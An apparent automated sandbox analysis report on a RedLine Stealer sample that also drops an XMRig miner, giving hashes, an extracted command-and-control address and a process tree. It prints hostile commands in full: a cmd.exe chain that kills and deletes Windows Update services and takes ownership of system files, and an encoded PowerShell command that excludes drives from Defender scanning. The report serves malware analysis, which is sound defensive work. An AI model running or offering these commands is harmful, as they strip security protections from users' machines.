Analysis
-
max time kernel
153s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system -
submitted
07-08-2022 07:30
Behavioral task
behavioral1
Sample
379a6a4f7be0d0e21a5e5b996ea8aeeb.exe
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
379a6a4f7be0d0e21a5e5b996ea8aeeb.exe
Resource
win10v2004-20220722-en
General
-
Target
379a6a4f7be0d0e21a5e5b996ea8aeeb.exe
-
Size
1.2MB
-
MD5
379a6a4f7be0d0e21a5e5b996ea8aeeb
-
SHA1
27df283dcb89ee72f304df89d3938239acc32439
-
SHA256
3080f7ed1cb9ec8fbf4c0cf992bd0eb9dba5f69d0342f58ebcc8943d28c77a97
-
SHA512
e6705fc43877d4f46052f03dbd0a17cdc5afee7b2d6eec4f944556d005a613e9b356361ad3df9cb5164925f5429109d348a4c0b90018220047f8956d9b32f4b8
Malware Config
Extracted
redline
LogsDiller Cloud (Sup: @mr_golds)
193.233.193.14:8163
-
auth_value
56c6f7b9024c076f0a96931453da7e56
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/190436-133-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
updater.exe11.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 11.exe -
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/8120-258-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/8120-259-0x000000014036EAC4-mapping.dmp xmrig behavioral2/memory/8120-260-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/8120-262-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/8120-267-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/8120-269-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
11.exepid process 4420 11.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 5304 takeown.exe 5332 icacls.exe 8280 takeown.exe 8292 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
11.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 8280 takeown.exe 8292 icacls.exe 5304 takeown.exe 5332 icacls.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\11.exe themida C:\Users\Admin\AppData\Local\Temp\11.exe themida behavioral2/memory/4420-153-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/4420-154-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/4420-158-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/6688-216-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/6688-220-0x0000000000400000-0x0000000001066000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Processes:
11.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 11.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.execonhost.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
11.exeupdater.exepid process 4420 11.exe 6688 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
379a6a4f7be0d0e21a5e5b996ea8aeeb.execonhost.exedescription pid process target process PID 4480 set thread context of 190436 4480 379a6a4f7be0d0e21a5e5b996ea8aeeb.exe AppLaunch.exe PID 6732 set thread context of 8120 6732 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.exesetup.exedescription ioc process File created C:\Program Files\Google\Libs\WR64.sys conhost.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\e761c88f-8004-4e57-acb3-a5173cf02855.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220807093202.pma setup.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1624 sc.exe 3504 sc.exe 3236 sc.exe 7932 sc.exe 7960 sc.exe 7996 sc.exe 4988 sc.exe 1348 sc.exe 8084 sc.exe 8128 sc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 6008 reg.exe 8268 reg.exe 8332 reg.exe 8344 reg.exe 5968 reg.exe 5988 reg.exe 8244 reg.exe 8256 reg.exe 5948 reg.exe 5284 reg.exe 8180 reg.exe 8320 reg.exe 5144 reg.exe 5232 reg.exe 5256 reg.exe 8228 reg.exe 8308 reg.exe 5180 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
AppLaunch.exepowershell.execonhost.exemsedge.exepowershell.EXEmsedge.exepowershell.exeidentity_helper.execonhost.exeexplorer.exepid process 190436 AppLaunch.exe 2516 powershell.exe 2516 powershell.exe 2228 conhost.exe 5456 msedge.exe 5456 msedge.exe 5484 powershell.EXE 5484 powershell.EXE 4192 msedge.exe 4192 msedge.exe 6812 powershell.exe 6812 powershell.exe 7516 identity_helper.exe 7516 identity_helper.exe 6732 conhost.exe 6732 conhost.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe 8120 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 660 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 4192 msedge.exe 4192 msedge.exe 4192 msedge.exe 4192 msedge.exe 4192 msedge.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
Processes:
AppLaunch.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.EXEpowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exeexplorer.exedescription pid process Token: SeDebugPrivilege 190436 AppLaunch.exe Token: SeDebugPrivilege 2516 powershell.exe Token: SeDebugPrivilege 2228 conhost.exe Token: SeShutdownPrivilege 3672 powercfg.exe Token: SeCreatePagefilePrivilege 3672 powercfg.exe Token: SeShutdownPrivilege 4904 powercfg.exe Token: SeCreatePagefilePrivilege 4904 powercfg.exe Token: SeShutdownPrivilege 5036 powercfg.exe Token: SeCreatePagefilePrivilege 5036 powercfg.exe Token: SeShutdownPrivilege 1628 powercfg.exe Token: SeCreatePagefilePrivilege 1628 powercfg.exe Token: SeTakeOwnershipPrivilege 5304 takeown.exe Token: SeDebugPrivilege 5484 powershell.EXE Token: SeDebugPrivilege 6812 powershell.exe Token: SeDebugPrivilege 6732 conhost.exe Token: SeShutdownPrivilege 7948 powercfg.exe Token: SeCreatePagefilePrivilege 7948 powercfg.exe Token: SeShutdownPrivilege 8092 powercfg.exe Token: SeCreatePagefilePrivilege 8092 powercfg.exe Token: SeShutdownPrivilege 8136 powercfg.exe Token: SeCreatePagefilePrivilege 8136 powercfg.exe Token: SeShutdownPrivilege 8172 powercfg.exe Token: SeCreatePagefilePrivilege 8172 powercfg.exe Token: SeTakeOwnershipPrivilege 8280 takeown.exe Token: SeLockMemoryPrivilege 8120 explorer.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msedge.exepid process 4192 msedge.exe 4192 msedge.exe 4192 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
379a6a4f7be0d0e21a5e5b996ea8aeeb.exeAppLaunch.exemsedge.exe11.execonhost.execmd.execmd.exedescription pid process target process PID 4480 wrote to memory of 190436 4480 379a6a4f7be0d0e21a5e5b996ea8aeeb.exe AppLaunch.exe PID 4480 wrote to memory of 190436 4480 379a6a4f7be0d0e21a5e5b996ea8aeeb.exe AppLaunch.exe PID 4480 wrote to memory of 190436 4480 379a6a4f7be0d0e21a5e5b996ea8aeeb.exe AppLaunch.exe PID 4480 wrote to memory of 190436 4480 379a6a4f7be0d0e21a5e5b996ea8aeeb.exe AppLaunch.exe PID 4480 wrote to memory of 190436 4480 379a6a4f7be0d0e21a5e5b996ea8aeeb.exe AppLaunch.exe PID 190436 wrote to memory of 4420 190436 AppLaunch.exe 11.exe PID 190436 wrote to memory of 4420 190436 AppLaunch.exe 11.exe PID 190436 wrote to memory of 4192 190436 AppLaunch.exe msedge.exe PID 190436 wrote to memory of 4192 190436 AppLaunch.exe msedge.exe PID 4192 wrote to memory of 2272 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 2272 4192 msedge.exe msedge.exe PID 4420 wrote to memory of 2228 4420 11.exe conhost.exe PID 4420 wrote to memory of 2228 4420 11.exe conhost.exe PID 4420 wrote to memory of 2228 4420 11.exe conhost.exe PID 2228 wrote to memory of 2516 2228 conhost.exe powershell.exe PID 2228 wrote to memory of 2516 2228 conhost.exe powershell.exe PID 2228 wrote to memory of 1152 2228 conhost.exe cmd.exe PID 2228 wrote to memory of 1152 2228 conhost.exe cmd.exe PID 2228 wrote to memory of 3808 2228 conhost.exe cmd.exe PID 2228 wrote to memory of 3808 2228 conhost.exe cmd.exe PID 1152 wrote to memory of 1624 1152 cmd.exe sc.exe PID 1152 wrote to memory of 1624 1152 cmd.exe sc.exe PID 3808 wrote to memory of 3672 3808 cmd.exe powercfg.exe PID 3808 wrote to memory of 3672 3808 cmd.exe powercfg.exe PID 1152 wrote to memory of 4988 1152 cmd.exe sc.exe PID 1152 wrote to memory of 4988 1152 cmd.exe sc.exe PID 3808 wrote to memory of 4904 3808 cmd.exe powercfg.exe PID 3808 wrote to memory of 4904 3808 cmd.exe powercfg.exe PID 1152 wrote to memory of 3504 1152 cmd.exe sc.exe PID 1152 wrote to memory of 3504 1152 cmd.exe sc.exe PID 3808 wrote to memory of 5036 3808 cmd.exe powercfg.exe PID 3808 wrote to memory of 5036 3808 cmd.exe powercfg.exe PID 1152 wrote to memory of 1348 1152 cmd.exe sc.exe PID 1152 wrote to memory of 1348 1152 cmd.exe sc.exe PID 3808 wrote to memory of 1628 3808 cmd.exe powercfg.exe PID 3808 wrote to memory of 1628 3808 cmd.exe powercfg.exe PID 2228 wrote to memory of 3516 2228 conhost.exe powershell.exe PID 2228 wrote to memory of 3516 2228 conhost.exe powershell.exe PID 1152 wrote to memory of 3236 1152 cmd.exe sc.exe PID 1152 wrote to memory of 3236 1152 cmd.exe sc.exe PID 1152 wrote to memory of 5144 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5144 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5180 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5180 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5232 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5232 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5256 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5256 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5284 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5284 1152 cmd.exe reg.exe PID 1152 wrote to memory of 5304 1152 cmd.exe takeown.exe PID 1152 wrote to memory of 5304 1152 cmd.exe takeown.exe PID 1152 wrote to memory of 5332 1152 cmd.exe icacls.exe PID 1152 wrote to memory of 5332 1152 cmd.exe icacls.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe PID 4192 wrote to memory of 5432 4192 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\379a6a4f7be0d0e21a5e5b996ea8aeeb.exe"C:\Users\Admin\AppData\Local\Temp\379a6a4f7be0d0e21a5e5b996ea8aeeb.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:190436 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\11.exe"4⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:1624 -
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:4988 -
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:3504 -
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
PID:1348 -
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
PID:3236 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f6⤵
- Modifies registry key
PID:5144 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f6⤵
- Modifies registry key
PID:5180 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f6⤵
- Modifies security service
- Modifies registry key
PID:5232 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f6⤵
- Modifies registry key
PID:5256 -
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f6⤵
- Modifies registry key
PID:5284 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5304 -
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5332 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f6⤵
- Modifies registry key
PID:5948 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f6⤵
- Modifies registry key
PID:5968 -
